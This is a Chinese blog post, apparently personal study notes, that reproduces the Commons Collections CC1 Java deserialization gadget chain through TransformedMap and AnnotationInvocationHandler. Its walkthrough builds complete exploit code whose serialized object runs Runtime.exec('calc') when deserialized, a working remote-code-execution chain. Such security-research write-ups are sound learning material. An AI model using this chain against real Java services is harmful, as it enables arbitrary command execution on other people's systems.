Java反序列化-cc1链挖掘复现(个人学习笔记)

最新推荐文章于 2024-07-19 16:09:28 发布
最新推荐文章于 2024-07-19 16:09:28 发布
阅读量792 收藏 30
点赞数 35
文章标签: 网络 java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64014167/article/details/139459370
版权

目录

前置知识

InvokerTransformer

ConstantTransformer

ChainedTransformer

开始复现挖掘CC1

问题一、

问题二、

柳暗花明

解决问题一:

解决问题二:

参考视频:

前置知识

首先看哪里调用了transform接口,下面介绍几个我们这是次cc1链需要用到的。

进入之后,发现会传入一个对象执行transform方法

快捷键 Ctrl+Alt+B,查看一下它的实现方法

重点介绍一下这三种

InvokerTransformer

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }

InvokerTransformer也是本次cc1的漏洞点

在InvokerTransformer里,我们可以传入方法名,参数类型数组和参数值数组,在这里有个transform方法,我们可以利用它来传入我们想要的数据,来执行某个的对象的目标方法。

ConstantTransformer

public ConstantTransformer(Object constantToReturn) {
        super();
        iConstant = constantToReturn;
    }

这个ConstantTransformer中的内容很好理解,因为constant代表常量,这里我们只要传入一个对象,它就会把对象return回来

ChainedTransformer

public ChainedTransformer(Transformer[] transformers) {
        super();
        iTransformers = transformers;
    }

这里传入的是Transformer[] 数组类型的参数,而这个类的transform方法比较有意思:它会把第i轮的输出再作为第i+1轮的输入,直到循环结束,return最终的结果。

开始复现挖掘CC1

首先,我们通过反射来进行弹计算器

 Runtime r = Runtime.getRuntime();
        Class c = Runtime.class;

        Method Method = (Method) c.getMethod("exec",String.class);
        Method.setAccessible(true);
        Method.invoke(r,"calc");

我们再通过InvokerTransformer的这种写法来修改一下:传入如下三种参数后进行调用它的transform方法,传入的是一个对象即可

        Runtime r = Runtime.getRuntime();
        Class c = Runtime.class;
//        Method rcMethod = (Method) c.getMethod("exec",String.class);
//        rcMethod.setAccessible(true);
//        rcMethod.invoke(r,"calc");
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);

我们接下来就看还有哪个类调用了transform方法,一直找不同类,直到找到readObject里面,可以看到TransformedMap类中的checkSetValue方法调用了transform()方法

valueTransformer.transform(value)

//受保护的方法
protected Object checkSetValue(Object value) {
      return valueTransformer.transform(value);
  }

我们再看看valueTransformer是从哪里过来的,在113行发现,它的构造方法是protected受保护的属性

 protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
      super(map);
      this.keyTransformer = keyTransformer;
      this.valueTransformer = valueTransformer;
  }

在73行还有一个静态(decorate)装饰方法,会返回new TransformedMap(map, keyTransformer, valueTransformer),通过这个方法我们就可以控制valuetransformer了。

那么现在就通过这个TransformedMap类有个checkSetValue方法,再延伸一下链子。(查看一下哪里调用了)然后发现在AbstractInputCheckedMapDecorator类中Setvalue方法中调用了这个checkSetValue方法

    static class MapEntry extends AbstractMapEntryDecorator {

        /** The parent map */
        private final AbstractInputCheckedMapDecorator parent;

        protected MapEntry(Map.Entry entry, AbstractInputCheckedMapDecorator parent) {
            super(entry);
            this.parent = parent;
        }

        public Object setValue(Object value) {
            value = parent.checkSetValue(value);
            return entry.setValue(value);
        }
    }

在这里:MapEntry是代表一个键值对,所以我们需要写一个键值对,然后传入的对象就是我们之前定义的Runtime对象

Runtime r = Runtime.getRuntime();

        Runtime r = Runtime.getRuntime();
//        Class c = Runtime.class;

//        Method rcMethod = (Method) c.getMethod("exec",String.class);
//        rcMethod.setAccessible(true);
//        rcMethod.invoke(r,"calc");
        InvokerTransformer invokerTransformer =  new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
        HashMap<Object,Object> map = new HashMap<>();
        map.put("key","value");
        //相当于 invokerTransformer.transform(r)
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,invokerTransformer);

        for (Map.Entry entry:transformedMap.entrySet()){
            entry.setValue(r);
        }

这里就弹出计算器了

setValue<-checksetValue<-invokerTransformer.transform()

接下来就是找谁调用了setValue,最好是在readObject里直接调用的,这样就可以直接交工了,不需要再往上继续找了。

最后,我们在AnnotationInvocationHandler类中找到了这个readObject方法,

        for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
            String name = memberValue.getKey();
            Class<?> memberType = memberTypes.get(name);
            if (memberType != null) {  // i.e. member still exists
                Object value = memberValue.getValue();
                if (!(memberType.isInstance(value) ||
                      value instanceof ExceptionProxy)) {
                    memberValue.setValue(
                        new AnnotationTypeMismatchExceptionProxy(
                            value.getClass() + "[" + value + "]").setMember(
                                annotationType.members().get(name)));
                }
            }
        }

这里也是对键值对进行循环,并且经过两个if判断才能调用到我们想要的setValue方法中,

这里还有一个细节,我们可以发现这里并没有修饰符,属于默认default类型,只有在这个包里面才能进行获取,所以我们需要通过反射来进行获取

这里选择通过全类名获取类

 Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance(Override.class,transformedMap);
        Serialize(o);

序列化生成ser.bin再反序列化是不能弹出计算器的,这里是为什么呢?

问题一、

Runtime类是没有序列化接口的,说明它没有办法进行序列化

问题二、

绕过两个if和setValue的参数问题

柳暗花明

解决问题一:

还是利用反射来解决

获取一个class类

Class c = Runtime.class;

反射获取public方法

Method method = rc.getMethod("getRuntime");

调用 method.invoke(null,null);,第一个null是因为getRuntime方法是一个静态方法,第二个null是无参数方法

  Class rc = Runtime.class;
  Method method = rc.getMethod("getRuntime",null);
  Runtime r = (Runtime) method.invoke(null,null);
  Method execMethod = rc.getMethod("exec",String.class);
  execMethod.invoke(r,"calc");

利用InvokerTransformer(),重新完善链子

首先再回顾一下InvokerTransformer()的参数吧

一、方法名

二、参数类型数组

三、参数值数组

new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);

参数值对应情况如下

one

        Method one = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
//        Class rc = Runtime.class;
//        Method method = rc.getMethod("getRuntime",null);

two

        Runtime two = (Runtime)new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(one);
//        Runtime two = (Runtime) method.invoke(null,null);

three

这个和上面是一样的

方法名exec 方法类型String 方法值 calc

        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(two);
        
//        Method execMethod = rc.getMethod("exec",String.class);
//        execMethod.invoke(r,"calc");

弹出来计算器了,删除注释后的代码

Method one = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
Runtime two = (Runtime)new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(one);
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(two);

这里发现他们就是个重复调用的过程,通过我命名one two 也可以更好看出来

那么我们在前置知识介绍的ChainedTransformer在这里就用到了

我们new 一个 transformer数组,把他们放进去

        Transformer[] transformers = new Transformer[]{
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                    new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(Runtime.class);
解决问题二:

在if下面打个断点,然后把之前注释的cc1.java中的重新放出来

        Transformer[] transformers = new Transformer[]{
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(Runtime.class);


        HashMap<Object, Object> map = new HashMap<>();
        map.put("key", "aa");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance(Override.class, transformedMap);

        Serialize(o);
        unserialize(o);

然后在AnnotationInvocationHandler类里面打个断点,可以看到我们是进不去第一个if的,因为我们override里面没有东西

还有@Target和@Retention注解,我们换个 @Retention注解看一下。

同时我们也要把键值对的键名也修改成value

修改后

再断点调试,可以看到,我们就进来了

还有就是解决setValue里面的参数问题了

从setValue是可以调用到这里的

valueTransformer.transform(value)
相当于
chainedTransformer.transform(Runtime.class)

那么我们如果改其中的值呢?也就是修改AnnotationTypeMismatchExceptionProxy@665,为我们想要的Runtime.class

这里就想到了我们之前介绍的 ConstantTransformer 类

它的特点就是无论接受什么参数,就会返回什么参数。因此我们可以用它来做文章即利用它的transform方法传入一个Runtime.class

    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);


    HashMap<Object, Object> map = new HashMap<>();
    map.put("value", "Rsecret");
    Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    declaredConstructor.setAccessible(true);
    Object o = declaredConstructor.newInstance(Retention.class, transformedMap);

    Serialize(o);
    unserialize(o);

再整理一下思路,我们调用了chainedTransformer.transform(),然后调用的是ConstantTransformer的transform方法,ConstantTransformer把输出变成了我们输入的Runtime.class

至此cc1链的其中一条链子学习完毕,还有一条cc1链是利用的LazyMap,后续有缘再更新吧~

谢谢师傅们,后续我也会观看本文章,进行相关的补充。

参考视频:

Java反序列化CommonsCollections篇(二)-最好用的CC链_哔哩哔哩_bilibili

Rsecret 
关注
  • 35
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 序列利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Java安全漫谈 - 07.序列篇(1)1
08-03
这使得Java序列更加灵活,但也带来了安全风险,因为恶意用户可以通过构造特殊的序列数据来触发意想不到的行为,比如执行任意代码。 PHP的序列序列则相对封闭,开发者无法直接修改序列数据流,...
Java安全研究——序列漏洞之CC链
weixin_43889136的博客
04-13 4070
0x01前言 apachecommons-collections组件下的序列漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03序列漏洞 序列是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
JavaSec 基础之 CC1 链,深入浅出
2401_84166497的博客
04-09 675
调用了 checkSetValue。而且它是 TransformedMap 的父类其副类。
CC1链分析与
weixin_42974824的博客
08-16 1461
CC1链分析与
yso之CC1链
weixin_45794666的博客
02-26 954
前言 Commons Collections的利用链也被称为cc链,在学习序列漏洞必不可少的一个部分。Apache Commons Collections是Java中应用广泛的一个库,包括Weblogic、JBoss、WebSphere、Jenkins等知名大型Java应用都使用了这个库。 Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实了各种集合工具类。作为Apache开源项目的重要组件,
CC3链分析与
weixin_42974824的博客
08-23 1169
CC3链分析与
CC2链分析与
weixin_42974824的博客
08-25 1025
CC2链分析与
基于混合分析的Java序列利用链挖掘方法
05-14
总的来说,基于混合分析的Java序列利用链挖掘方法是针对Java应用安全的一种重要技术进步,它通过自动工具减轻了人工分析的负担,提升了漏洞检测的能力,对于保障Java应用的安全具有重要意义。这一方法的应用有...
java序列工具
11-21
Java序列是一种将已序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方式。在Java应用程序中,序列用于保存对象的状态以便稍后恢,或者在网络间传输对象。然而,这个过程也可能引入...
java序列利用程序UI版Beta1.1.rar
07-20
Java序列是一种将已序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方式。在Java应用程序中,序列用于将对象的状态转换为字节流,以便可以存储或在网络上传输。而序列则将这个字节...
CC6链分析与
weixin_42974824的博客
08-18 663
CC6链分析与
Java序列:CC1链 详解
Jay17的博客
10-06 1056
Java序列:CC1链 详解
一文带你搞懂CC1链(小白入门必看文章)
maple_leaf
12-03 2165
CC链是利用Java序列漏洞进行攻击的一种方式。CC链利用Apache Commons Collections库中的Transformer接口的实类,通过巧妙的设计,将恶意代码序列为一个对象,然后将该对象传递给一个序列函数,从而触发恶意代码的执行。
Java 序列之 CC1-国内版
Mirror_iu的博客
02-23 199
跟着芜风师傅学习的CC链,我总结出了自己的一版。
Java安全学习笔记--序列利用链CC1链(1)
m0_64685672的博客
01-16 1046
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
cc链1分析
Sk1y的博客
04-08 724
cc链1分析 文章目录cc链1分析jdk版本依赖测试弹计算器用射去调用Runtime,去弹一个计算器倒序找链危险函数InvokerTransformer-->transformerTransformedMapMapEntry入口AnnotationInvocationHandlerRuntime序列ChainedTransformer类对其简继续调试 jdk版本 jdk版本:jdk8u65 因为在jdk8u71的时候,已经修了 下载相应的jdk版本,去下面这个链接 https://www.or
【Socket 编程】基于UDP协议建立多人聊天室
最新发布
稻草人敲代码的博客
07-19 352
对于服务端来说,除了要接收消息之外,还要实一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实的功能只有收消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值